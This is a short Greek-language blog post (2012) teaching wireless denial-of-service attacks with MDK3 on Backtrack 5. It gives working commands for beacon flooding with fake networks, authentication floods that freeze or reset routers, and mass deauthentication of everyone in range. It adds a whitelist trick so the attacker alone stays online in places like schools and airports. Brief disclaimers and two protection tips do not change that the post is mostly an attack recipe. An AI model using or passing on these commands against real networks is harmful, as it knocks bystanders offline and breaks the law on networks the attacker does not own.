ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι


Τρίτη 3 Ιανουαρίου 2012

MDK3 φερτε τον πανικο σε ασυρματα δικτυα

ΠΡΟΣΟΧΗ εφαρμοζοντας αυτον τον οδηγο σε ξενα δικτυα ειναι παρανομος καθως και πολυ ενοχλητικος ΔΕΝ ευθυνομαι για κακοβουλη χρηση του.


Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • ανοιγουμε ενα τερματικο και γραφουμε airmon-ng start wlan0
  • mdk

  •  εδω μας εμφανιζει καποιες επιλογες εγω θα σας δειξω μερικες για να δειτε τι μπορειτε να κανετε
  • Beacon flood mode
  • mdk3 mon0 b  
 - με αυτη την επιλογη μπορειτε να στειλετε ψευτικα δικτυα σε ολη την γειτονια και αν γραψετε mdk3 b --help θα σας εμφανισει διαφορες επιλογες οπως 

  • mdk3 mon0 b -n nickthesail0r  - το ονομα των δικτυων θα λεγετε nickthesail0r
  • mdk3 mon0 b -f /root/diktya.txt -οπου στο αρχειο diktya θα βαλετε εσεις τα ονοματα που θελετε να εκπεμπουνε 
  •  mdk3 mon0 b -t -f /root/diktya.txt -oπου -t θα λεει οτι τα δικτυα μας ειναι με wpa κωδικοποιηση
  • Authentication DoS mode   
  •  mdk3 mon0 a - με αυτη την επιλογη μπορει να παγωσει τα ρουτερ η να τα κανει reset επισεις σας λεει αν καποιο ρουτερ ειναι ευαλωτο και αν θελετε συγκεριμενα για ενα ρουτερ απλα γραψτε mdk3 mon0 a -a mac address του ρουτερ
  •  Deauthentication / Disassociation Amok Mode
  •  mdk3 mon0 d με αυτη την επιλογη αποσυνδεετε ολους του χρηστες που ειναι στην εμβελεια σας 

  •  mdk3 --help d μας δινει διαφορες επιλογες οπως

  •  mdk3 mon0 d -w /root/white.txt οπου στο αρχειο white θα εχω γραψει την mac address μου θα μου επιτρεπει να εχω συνδεση στο ιντερνετ εκτος απο ολους τους αλλους που ειναι στην εμβελεια μου συνηθως το κανετε αυτο αν ειστε σε κοινο χωρο σχολειο,αεροδρομιο κτλ

Πως θα προστατευτειτε;

1.Αλλαξτε τις ρυθμισεις στο ρουτερ σας να μην δεχετε αλλους σταθμους και σε wpa2 αν εχει αυτη την επιλογη
2.Ο καλυτερος τροπος για να προστατευτειτε ειναι να ειστε συνδεδεμενοι ενσυρματα και οχι ασυρματα στο δικτυο σας

Δεν υπάρχουν σχόλια: